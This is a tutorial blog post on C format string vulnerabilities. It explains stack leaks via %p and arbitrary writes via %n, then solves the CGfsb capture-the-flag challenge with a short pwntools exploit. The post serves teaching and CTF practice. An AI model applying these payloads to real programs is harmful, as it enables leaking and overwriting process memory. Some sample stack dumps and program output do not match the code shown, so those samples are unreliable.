<> A detailed explanation of format string vulnerabilities

Recently I read a lot of articles about exploiting format string vulnerabilities and found that most of them did not explain much, so I decided to write one myself and work through the topic with examples.

<>1. How the vulnerability arises

For ordinary functions, the cdecl (C Declaration) calling convention requires the caller to push the arguments onto the stack from right to left. **However, printf is not an ordinary function: it is one of the C library's variadic (variable-argument) functions, so the callee has no way of knowing how many arguments were pushed before the call. printf therefore takes a format argument that specifies the number and types of the arguments, and it fetches values from the stack one by one, exactly as the format dictates, and prints them.** So which conversion specifiers are available?

* %d: print as a decimal integer
* %s: print as a string
* %x: print as a hexadecimal integer
* %c: print as a character
* %p: print as a pointer
* %n: print nothing; store the number of characters output so far, as an int, at the address given by the corresponding argument

Let's take a look at the sample code :
#include <stdio.h>

int main() {
    printf("%s %d %d %d %d", "num", 1, 2, 3, 4);
    return 0;
}
When the program above is compiled as 32-bit code, the relevant part of the disassembly looks like this:
0x000011ad <+20>: add eax,0x2e53
0x000011b2 <+25>: sub esp,0x8
0x000011b5 <+28>: push 0x4
0x000011b7 <+30>: push 0x3
0x000011b9 <+32>: push 0x2
0x000011bb <+34>: push 0x1
0x000011bd <+36>: lea edx,[eax-0x1ff8]
0x000011c3 <+42>: push edx
0x000011c4 <+43>: lea edx,[eax-0x1ff4]
0x000011ca <+49>: push edx
0x000011cb <+50>: mov ebx,eax
0x000011cd <+52>: call 0x1030 <printf@plt>
At this point, the stack contains:
00:0000│ esp 0xffffd190 —▸ 0x5655700c ◂— '%d %d %d %d %s %x %x'
01:0004│     0xffffd194 —▸ 0x56557008 ◂— 0x6d756e /* 'num' */
02:0008│     0xffffd198 ◂— 0x1
03:000c│     0xffffd19c ◂— 0x2
04:0010│     0xffffd1a0 ◂— 0x3
05:0014│     0xffffd1a4 ◂— 0x4
06:0018│     0xffffd1a8 —▸ 0xffffd27c —▸ 0xffffd452 ◂— 'SHELL=/bin/bash'
07:001c│     0xffffd1ac —▸ 0x565561ad (main+20) ◂— add eax, 0x2e53
Here a bold idea comes to mind: what happens if the format string contains more conversion specifiers than there are arguments to print?

Sample code:
#include <stdio.h>

int main() {
    printf("%s %d %d %d %d %x %x", "num", 1, 2, 3, 4);
    return 0;
}
Disassembly:
0x000011ad <+20>: add eax,0x2e53
0x000011b2 <+25>: sub esp,0x8
0x000011b5 <+28>: push 0x4
0x000011b7 <+30>: push 0x3
0x000011b9 <+32>: push 0x2
0x000011bb <+34>: push 0x1
0x000011bd <+36>: lea edx,[eax-0x1ff8]
0x000011c3 <+42>: push edx
0x000011c4 <+43>: lea edx,[eax-0x1ff4]
0x000011ca <+49>: push edx
0x000011cb <+50>: mov ebx,eax
0x000011cd <+52>: call 0x1030 <printf@plt>
Stack:
00:0000│ esp 0xffffd190 —▸ 0x5655700c ◂— '%d %d %d %d %s %x %x'
01:0004│     0xffffd194 —▸ 0x56557008 ◂— 0x6d756e /* 'num' */
02:0008│     0xffffd198 ◂— 0x1
03:000c│     0xffffd19c ◂— 0x2
04:0010│     0xffffd1a0 ◂— 0x3
05:0014│     0xffffd1a4 ◂— 0x4
06:0018│     0xffffd1a8 —▸ 0xffffd27c —▸ 0xffffd44e ◂— 'SHELL=/bin/bash'
07:001c│     0xffffd1ac —▸ 0x565561ad (main+20) ◂— add eax, 0x2e53
Running results:
1 2 3 33 test 1a1390 4013e8
--------------------------------
Process exited after 0.01398 seconds with return value 0
Although the format string contains 7 conversion specifiers, only 5 arguments were actually pushed onto the stack after it. printf therefore prints two extra stack values that were never meant to be output (the two trailing hexadecimal numbers). By exploiting this flaw, we have just leaked data from the stack.
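The over-read can be imitated with a toy model. The sketch below is not how printf is implemented; it only assumes that each conversion consumes the next 4-byte stack slot, and it reuses the words from the stack dump above (everything after the format-string pointer). The names `toy_printf`, `STACK_AFTER_FORMAT` and `STRINGS` are made up for this illustration.

```python
# Toy model only: real printf fetches its varargs through the C calling
# convention. The words are copied from the stack dump in the article
# (the slots that follow the format-string pointer).
STACK_AFTER_FORMAT = [0x56557008, 0x1, 0x2, 0x3, 0x4, 0xFFFFD27C, 0x565561AD]
STRINGS = {0x56557008: "num"}  # what the %s pointer points at


def toy_printf(fmt, stack):
    """Consume one stack word per conversion, with no bounds check."""
    out = []
    slot = 0
    i = 0
    while i < len(fmt):
        if fmt[i] == "%" and i + 1 < len(fmt):
            word = stack[slot]  # nobody verifies the caller passed this slot
            slot += 1
            conv = fmt[i + 1]
            if conv == "s":
                out.append(STRINGS[word])
            elif conv == "d":
                out.append(str(word))
            elif conv == "x":
                out.append(format(word, "x"))
            else:
                raise ValueError("unsupported conversion: " + conv)
            i += 2
        else:
            out.append(fmt[i])
            i += 1
    return "".join(out)


leak = toy_printf("%s %d %d %d %d %x %x", STACK_AFTER_FORMAT)
print(leak)
```

In this model the two extra `%x` conversions simply return the next two words of the dump, which are data the caller never passed as arguments.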

<>2. Exploiting the vulnerability

<>1). Leaking memory contents

Let's work through a challenge from the Attack and Defense World platform (CGfsb) to understand this point.

Here is the main body of the pseudocode produced by IDA:
01| puts("please tell me your name:");
02| read(0, &v5, 0xAu);
03| puts("leave your message please:");
04| fgets((char *)&v8, 100, stdin);
05| printf("hello %s", &v5);
06| puts("your message is:");
07| printf((const char *)&v8);
08| if ( pwnme == 8 )
09| {
10|   puts("you pwned me, here is your flag:\n");
11|   system("cat flag");
12| }
13| else
14| {
15|   puts("Thank you!");
16| }
Look at line 7: printf prints the v8 buffer we entered earlier, but v8 is passed as the format string itself instead of as an argument to a fixed format. We can therefore craft the contents of v8 so that printf treats our input as conversion specifiers and obediently prints whatever values we ask for.

Running it:
Starting program: /root/pwn resources/gongfang/CGfsb_print_f
please tell me your name:
aaaa
leave your message please:
AAAA %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
hello aaaa
your message is:
AAAA0xffffd13e 0xf7fae580 0xffffd19c 0xf7ffdae0 0x1 0xf7fcb410 0x61610001 0xa6161 (nil) 0x41414141 0x25207025 0x70252070 0x20702520 0x20207025 0x20207025 0x20207025 0x20207025 0x20207025 0x20207025
Thank you!
[Inferior 1 (process 622877) exited normally]
Clearly, the program leaked the values of 19 stack words, starting where printf expects its arguments to be. In theory, we can use this vulnerability to read any value on the stack (yes, the joy of doing whatever you like).
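To see what the leaked words actually are, they can be turned back into bytes. The sketch below takes the 19 values from the run above, assumes a little-endian 32-bit target (as in the dumps), and uses only Python's standard `struct` module; the variable names are chosen for this illustration.

```python
import struct

# The 19 values printed by the run above ("(nil)" is a null pointer, i.e. 0).
leaked = (
    "0xffffd13e 0xf7fae580 0xffffd19c 0xf7ffdae0 0x1 0xf7fcb410 0x61610001 "
    "0xa6161 (nil) 0x41414141 0x25207025 0x70252070 0x20702520 0x20207025 "
    "0x20207025 0x20207025 0x20207025 0x20207025 0x20207025"
)

words = [0 if tok == "(nil)" else int(tok, 16) for tok in leaked.split()]

# x86 is little-endian, so "<I" recovers the byte order as it sits in memory.
raw = [struct.pack("<I", w) for w in words]

name_area = raw[6] + raw[7]       # contains the "aaaa\n" typed as the name
marker = raw[9]                   # the "AAAA" at the start of the message
format_text = raw[10] + raw[11]   # the beginning of the "%p %p ..." text

print(name_area, marker, format_text)
```

The 7th and 8th words hold the name that was typed in, the 10th is the `AAAA` marker, and the words after it are the `%p` text itself, which shows that the message buffer lies in the region printf is walking through.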

<>2). Writing to an arbitrary address

Some readers may be puzzled by this heading: how can printf perform a write?

Writing to an arbitrary address relies on the %n specifier mentioned above. For example:
#include <stdio.h>

int main(void) {
    int c = 0;
    /* %n prints nothing; it stores the number of characters output so far in c */
    printf("the usage of %n", &c);
    printf("c = %d\n", c);
    return 0;
}
This program prints "the usage of c = 13", because "the usage of " is 13 characters long.

In other words, **%n stores the number of characters output so far in the variable c**.

So if we can change the address that sits in the stack slot where &c would be, can't we write a value of our choosing to any address we like?

If that is not clear yet, no problem. Let's look at the layout of the stack:

Top of printf's stack
Format string (%d %x %s %n)
Argument 1 to print (%d format)
Argument 2 to print (%x format)
Argument 3 to print (%s format)
Argument 4, the write target (an address)
Bottom of printf's stack
Top of the calling function's stack



In other words, the total number of characters output so far is written to the address held in argument 4. So as long as we control how many characters are printed beforehand, we control the value written to that address.

But that raises another question: how do we control the value of argument 4, the address itself?

For that we need another printf feature: the $ positional syntax, which lets a conversion refer to the argument at a specified position.

That is, if the format string contains "%6$n", the number of characters output so far is written to the address held in printf's 6th argument. But printf does not know how many arguments it was really given, so all we need is an offset that lands in memory we can modify, for example the v8 buffer in this challenge.
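The mechanics of a positional `%n` can be sketched with a toy model. This is an illustration under stated assumptions, not glibc's behaviour in full: it assumes a 32-bit little-endian stack, counts only literal bytes, and treats the buffer holding the format string as lying on the stack right after five other slots, so the buffer's first word becomes "argument 6". `TARGET`, `toy_printf_n` and the slot values are hypothetical.

```python
import re
import struct

TARGET = 0x0804A010  # hypothetical writable address, chosen only for this sketch


def toy_printf_n(fmt, slots_before_buffer, memory):
    """Toy model: '%<k>$n' stores the running character count at the
    address found in the k-th stack slot (1-based)."""
    # The format buffer itself is on the stack, so its bytes show up as
    # further "arguments" after the slots that precede it.
    padded = fmt + b"\x00" * (-len(fmt) % 4)
    stack = list(slots_before_buffer)
    stack += [word for (word,) in struct.iter_unpack("<I", padded)]

    count = 0  # characters "printed" so far
    pos = 0
    for match in re.finditer(rb"%(\d+)\$n", fmt):
        count += match.start() - pos            # literal bytes before this %n
        address = stack[int(match.group(1)) - 1]
        memory[address] = count
        pos = match.end()
    return memory


fmt = struct.pack("<I", TARGET) + b"%6$n"
memory = toy_printf_n(fmt, [0x11, 0x22, 0x33, 0x44, 0x55], {TARGET: 0})
print(hex(TARGET), "->", memory[TARGET])
```

Here the four address bytes are the only characters "printed" before `%6$n`, so the model stores 4 at `TARGET`. Putting the address at the start of the buffer is what makes the chosen slot hold a pointer we control.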

So what is the offset in this challenge?

Look again at the output produced by the stack-peeking input we constructed earlier:
AAAA 0xffffd13e 0xf7fae580 0xffffd19c 0xf7ffdae0 0x1 0xf7fcb410 0x61610001
0xa6161 (nil) 0x41414141 0x25207025 0x70252070 0x20702520 0x20207025 0x20207025
0x20207025 0x20207025 0x20207025 0x20207025

Notice '0x41414141': that is the AAAA we typed in. In other words, the memory we control sits at the position of printf's 10th argument (printf does not really have that many arguments, but it has no way of knowing that). Where does the 10 come from? Nine other values are printed between the echoed AAAA and 0x41414141, so v8 lines up with the tenth argument.
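The counting can also be done mechanically. The helper below is a small sketch (the name `find_offset` is made up here) that scans the `%p` output quoted above for the word matching the marker and returns its 1-based position, assuming a little-endian target.

```python
import re


def find_offset(leak_output, marker=b"AAAA"):
    """Return the 1-based position of the leaked word equal to the marker."""
    wanted = int.from_bytes(marker, "little")
    tokens = re.findall(r"0x[0-9a-fA-F]+|\(nil\)", leak_output)
    values = [0 if tok == "(nil)" else int(tok, 16) for tok in tokens]
    return values.index(wanted) + 1


leak_output = (
    "AAAA 0xffffd13e 0xf7fae580 0xffffd19c 0xf7ffdae0 0x1 0xf7fcb410 0x61610001 "
    "0xa6161 (nil) 0x41414141 0x25207025 0x70252070 0x20702520 0x20207025 0x20207025 "
    "0x20207025 0x20207025 0x20207025 0x20207025"
)

offset = find_offset(leak_output)
print(offset)
```

The regular expression only picks up `0x...` and `(nil)` tokens, so it does not matter whether the echoed `AAAA` is separated from the first value by a space.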

Now we can write our exploit:
from pwn import *

r = process("./CGfsb")

# Address of pwnme; double-click the variable in the IDA pseudocode to see it.
pwnme_addr = 0x0804A068

# p32() packs the address of pwnme into 32 bits, i.e. four bytes.
# pwnme must equal 8, so 'aaaa' pads the output up to 8 characters before %10$n.
payload = p32(pwnme_addr) + b'aaaa' + b'%10$n'

r.recvuntil(b"please tell me your name:\n")
r.sendline(b'aaaa')
r.recvuntil(b"leave your message please:\n")
r.sendline(payload)
r.interactive()
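The payload arithmetic can be checked without running the target. The sketch below uses `struct.pack("<I", ...)` from the standard library as a stand-in for pwntools' `p32`, so it runs without pwntools installed; the checks for NUL and newline bytes are an extra sanity test added here, on the assumption that fgets stops reading at a newline and printf stops printing at a NUL.

```python
import struct

PWNME_ADDR = 0x0804A068  # the address used in the exploit above

# Same layout as the exploit: 4 address bytes + 4 padding bytes + the write.
payload = struct.pack("<I", PWNME_ADDR) + b"aaaa" + b"%10$n"

# Number of characters printed before %10$n, i.e. the value that gets written.
printed_before_n = payload.index(b"%10$n")

# Bytes that would cut the input (newline) or the output (NUL) short.
bad_bytes = [b for b in (0x00, 0x0A) if b in payload]

print(payload, printed_before_n, bad_bytes)
```

Four address bytes plus four padding bytes give the count of 8 that the check `pwnme == 8` requires, and the 13-byte payload fits comfortably within the 100 bytes read by fgets.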

This article took me two days of looking things up and writing code. Along the way I asked quite a few experts but never got the answer I wanted, so in the end it rests on my own understanding of the assembly and of how these functions behave. Sure enough, once you step through the door of pwn it is as deep as the sea, and from then on your hair is a stranger. If the article helped you, a like would go a long way toward supporting my thinning scalp [manual smirk]
